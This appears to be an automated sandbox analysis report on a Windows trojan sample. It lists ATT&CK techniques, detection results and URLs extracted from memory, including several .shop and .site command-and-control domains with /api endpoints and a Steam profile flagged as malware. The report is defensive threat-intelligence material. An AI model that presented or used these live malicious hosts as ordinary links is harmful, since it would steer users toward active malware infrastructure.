            Source: Yara matchFile source: 00000000.00000002.1886487919.00000000007D0000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Command and Scripting Interpreter            		1
            Registry Run Keys / Startup Folder            		11
            Process Injection            		1
            Masquerading            		OS Credential Dumping1
            Query Registry            		Remote Services1
            Archive Collected Data            		11
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		1
            DLL Side-Loading            		1
            Registry Run Keys / Startup Folder            		1
            Virtualization/Sandbox Evasion            		LSASS Memory11
            Security Software Discovery            		Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Disable or Modify Tools            		Security Account Manager1
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection            		NTDS2
            System Information Discovery            		Distributed Component Object ModelInput Capture114
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Obfuscated Files or Information            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe18%ReversingLabs

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://player.vimeo.com0%URL Reputationsafe
            https://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
            https://www.gstatic.cn/recaptcha/0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af60%URL Reputationsafe
            http://www.valvesoftware.com/legal.htm0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;0%URL Reputationsafe
            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL0%URL Reputationsafe
            https://steam.tv/0%URL Reputationsafe
            https://steamcommunity.com/profiles/76561199724331900100%URL Reputationmalware
            https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=english0%URL Reputationsafe
            http://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
            http://www.symauth.com/cps0(0%URL Reputationsafe
            https://steamcommunity.com/profiles/76561199724331900/inventory/100%URL Reputationmalware
            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg0%URL Reputationsafe
            https://store.steampowered.com/privacy_agreement/0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt00%URL Reputationsafe
            http://www.symauth.com/rpa000%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am0%URL Reputationsafe
            https://checkout.steampowered.com/0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=english0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englis0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC0%URL Reputationsafe
            https://store.steampowered.com/;0%URL Reputationsafe
            https://store.steampowered.com/about/0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=english0%URL Reputationsafe
            https://help.steampowered.com/en/0%URL Reputationsafe
            https://community.akamai.steamstatic.com/0%URL Reputationsafe
            http://store.steampowered.com/subscriber_agreement/0%URL Reputationsafe
            https://medal.tv0%URL Reputationsafe
            https://fragnantbui.shop/apip100%Avira URL Cloudmalware
            https://vozmeatillu.shop/O9100%Avira URL Cloudmalware
            https://steamcommunity.com/?subsection=broadcasts0%Avira URL Cloudsafe
            http://crl.thawte.com/ThawteTimestampingCA.crl00%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=10%URL Reputationsafe
            https://store.steampowered.com/legal/0%URL Reputationsafe
            https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=e0%URL Reputationsafe
            https://vozmeatillu.shop/0100%Avira URL Cloudmalware
            stogeneratmns.shop100%Avira URL Cloudmalware
            https://reinforcenh.shop//O9100%Avira URL Cloudmalware
            https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&amp;l=e0%Avira URL Cloudsafe
            https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png0%Avira URL Cloudsafe
            https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=engl0%URL Reputationsafe
            reinforcenh.shop100%Avira URL Cloudmalware
            https://www.youtube.com0%Avira URL Cloudsafe
            https://reinforcenh.shop/api100%Avira URL Cloudmalware
            https://www.google.com0%Avira URL Cloudsafe
            https://gutterydhowi.shop/100%Avira URL Cloudmalware
            ghostreedmnu.shop100%Avira URL Cloudmalware
            https://ballotnwu.site/hP0%Avira URL Cloudsafe
            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dcd0%Avira URL Cloudsafe
            https://s.ytimg.com;0%Avira URL Cloudsafe
            https://reinforcenh.shop/100%Avira URL Cloudmalware
            https://ghostreedmnu.shop/100%Avira URL Cloudmalware
            https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP0%Avira URL Cloudsafe
            https://store.steampowered.com/points/shop/0%Avira URL Cloudsafe
            https://community.akam0%Avira URL Cloudsafe
            https://vozmeatillu.shop/api100%Avira URL Cloudmalware
            https://sketchfab.com0%Avira URL Cloudsafe
            https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=en0%Avira URL Cloudsafe
            fragnantbui.shop100%Avira URL Cloudmalware
            https://www.youtube.com/0%Avira URL Cloudsafe
            drawzhotdog.shop100%Avira URL Cloudmalware
            offensivedzvju.shop100%Avira URL Cloudmalware
            https://offensivedzvju.shop/api100%Avira URL Cloudmalware
            https://recaptcha.net/recap80%Avira URL Cloudsafe
            https://www.google.com/recaptcha/0%Avira URL Cloudsafe
            https://stogeneratmns.shop/g9100%Avira URL Cloudmalware
            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=english0%Avira URL Cloudsafe
            vozmeatillu.shop100%Avira URL Cloudmalware
            https://vozmeatillu.shop/apip100%Avira URL Cloudmalware
            https://drawzhotdog.shop/api100%Avira URL Cloudmalware
            https://reinforcenh.shop:443/api100%Avira URL Cloudmalware
            https://steamcommunity.com/my/wishlist/0%Avira URL Cloudsafe
            https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/0%Avira URL Cloudsafe
            https://gutterydhowi.shop/api100%Avira URL Cloudmalware
            https://steamcommunity.com/market/0%Avira URL Cloudsafe
            https://store.steampowered.com/news/0%Avira URL Cloudsafe
            https://reinforcenh.shop/apiiU100%Avira URL Cloudmalware
            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org0%Avira URL Cloudsafe
            https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r10%Avira URL Cloudsafe
            https://offensivedzvju.shop/100%Avira URL Cloudmalware
            https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=en0%Avira URL Cloudsafe
            http://piriform.com/go/app_cc_privacy_policy0%Avira URL Cloudsafe
            https://steamcommunity.com/discussions/0%Avira URL Cloudsafe
            https://vozmeatillu.shop/100%Avira URL Cloudmalware
            https://store.steampowered.com/steam_refunds/0%Avira URL Cloudsafe
            https://store.steampowered.com/stats/0%Avira URL Cloudsafe
            https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a0%Avira URL Cloudsafe
            https://ballotnwu.site/cP0%Avira URL Cloudsafe
            https://reinforcenh.shop/7100%Avira URL Cloudmalware
            https://steamcommunity.com/workshop/0%Avira URL Cloudsafe
            https://steamcommunity.com/login/home/?goto=profiles%2F765611997243319000%Avira URL Cloudsafe
            https://ghostreedmnu.shop/f100%Avira URL Cloudmalware
            https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv0%Avira URL Cloudsafe
            https://ballotnwu.site/0%Avira URL Cloudsafe
            https://ballotnwu.site/api100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            fragnantbui.shop
            		188.114.97.3
            		truetrue
              		unknown
              gutterydhowi.shop
              		104.21.4.136
              		truetrue
                		unknown
                steamcommunity.com
                		104.102.49.254
                		truefalse
                  		unknown
                  offensivedzvju.shop
                  		188.114.97.3
                  		truetrue
                    		unknown
                    stogeneratmns.shop
                    		188.114.96.3
                    		truetrue
                      		unknown
                      reinforcenh.shop
                      		172.67.208.139
                      		truetrue
                        		unknown
                        drawzhotdog.shop
                        		172.67.162.108
                        		truetrue
                          		unknown
                          ghostreedmnu.shop
                          		188.114.97.3
                          		truetrue
                            		unknown
                            vozmeatillu.shop
                            		188.114.96.3
                            		truetrue
                              		unknown
                              ballotnwu.site
                              		172.67.128.144
                              		truetrue
                                		unknown

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                stogeneratmns.shoptrue
                                • Avira URL Cloud: malware
                                		unknown
                                reinforcenh.shoptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://reinforcenh.shop/apitrue
                                • Avira URL Cloud: malware
                                		unknown
                                ghostreedmnu.shoptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://steamcommunity.com/profiles/76561199724331900true
                                • URL Reputation: malware
                                		unknown
                                https://vozmeatillu.shop/apitrue
                                • Avira URL Cloud: malware
                                		unknown
                                fragnantbui.shoptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://offensivedzvju.shop/apitrue
                                • Avira URL Cloud: malware
                                		unknown
                                offensivedzvju.shoptrue
                                • Avira URL Cloud: malware
                                		unknown
                                drawzhotdog.shoptrue
                                • Avira URL Cloud: malware
                                		unknown
                                vozmeatillu.shoptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://drawzhotdog.shop/apitrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://gutterydhowi.shop/apitrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://ballotnwu.site/apitrue
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://player.vimeo.comSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://reinforcenh.shop//O9SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://steamcommunity.com/?subsection=broadcastsSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://vozmeatillu.shop/O9SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C10000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=B0lGn8MokmdT&amp;l=eSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/subscriber_agreement/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.gstatic.cn/recaptcha/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://fragnantbui.shop/apipSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C05000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.valvesoftware.com/legal.htmSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://vozmeatillu.shop/0SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000BC5000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://www.youtube.comSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.google.comSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://reinforcenh.shop/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://gutterydhowi.shop/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://ballotnwu.site/hPSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C23000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://s.ytimg.com;SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://steam.tv/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://ghostreedmnu.shop/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000BF2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000BF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dcdSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGPSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://store.steampowered.com/privacy_agreement/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://store.steampowered.com/points/shop/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://sketchfab.comSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.symauth.com/cps0(SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://steamcommunity.com/profiles/76561199724331900/inventory/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmptrue
                                • URL Reputation: malware
                                		unknown
                                https://www.youtube.com/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://store.steampowered.com/privacy_agreement/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.symauth.com/rpa00SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, AviraOculus.exe.0.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://recaptcha.net/recap8SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://www.google.com/recaptcha/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://checkout.steampowered.com/SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1964134826.0000000000C31000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966435008.0000000000C33000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://stogeneratmns.shop/g9SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1940303573.0000000000C10000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1963951825.0000000000C3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                https://vozmeatillu.shop/apipSecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1897106649.0000000000C03000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
